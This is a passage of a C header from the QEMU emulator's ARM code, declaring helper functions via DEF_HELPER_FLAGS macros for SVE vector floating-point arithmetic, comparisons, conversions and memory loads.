TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_rsqrts_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_rsqrts_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_rsqrts_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_faddv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_faddv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_faddv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxnmv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxnmv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxnmv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminnmv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminnmv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminnmv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fmaxv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fadda_h, TCG_CALL_NO_RWG, i64, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fadda_s, TCG_CALL_NO_RWG, i64, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fadda_d, TCG_CALL_NO_RWG, i64, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmge0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmge0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmge0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmgt0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmgt0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmgt0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmlt0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmlt0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmlt0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmle0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmle0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmle0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmeq0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmeq0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmeq0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmne0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmne0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmne0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmul_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmul_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmul_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fdiv_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fdiv_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fdiv_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmin_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmin_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmin_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmax_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmax_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmax_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnum_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnum_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnum_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnum_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnum_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnum_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fabd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fabd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fabd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fscalbn_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fscalbn_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fscalbn_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmulx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmulx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmulx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadds_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadds_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadds_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmuls_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmuls_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmuls_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubrs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubrs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubrs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnms_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnms_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnms_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnms_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnms_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnms_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmins_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmins_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmins_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_sh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_dh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_hs, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_hd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_hs, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_hd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_hs, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_hd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frint_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frint_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frint_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frintx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frintx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frintx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frecpx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frecpx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frecpx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fsqrt_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fsqrt_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fsqrt_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_sh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_dh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_sh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_dh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmge_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmge_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmge_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmgt_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmgt_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmgt_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmeq_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmeq_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmeq_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmne_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmne_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmne_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmuo_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmuo_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmuo_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facge_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facge_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facge_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facgt_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facgt_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facgt_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmla_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmla_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmla_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmls_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmls_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmls_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmla_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmla_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmla_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmls_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmls_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmls_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fcmla_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fcmla_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fcmla_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_5(sve_ftmad_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ftmad_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ftmad_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ld1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bhu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bsu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bdu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bhs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bss_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bds_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hsu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hsu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bhu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bsu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bdu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bhs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bss_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bds_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hh_le_r, 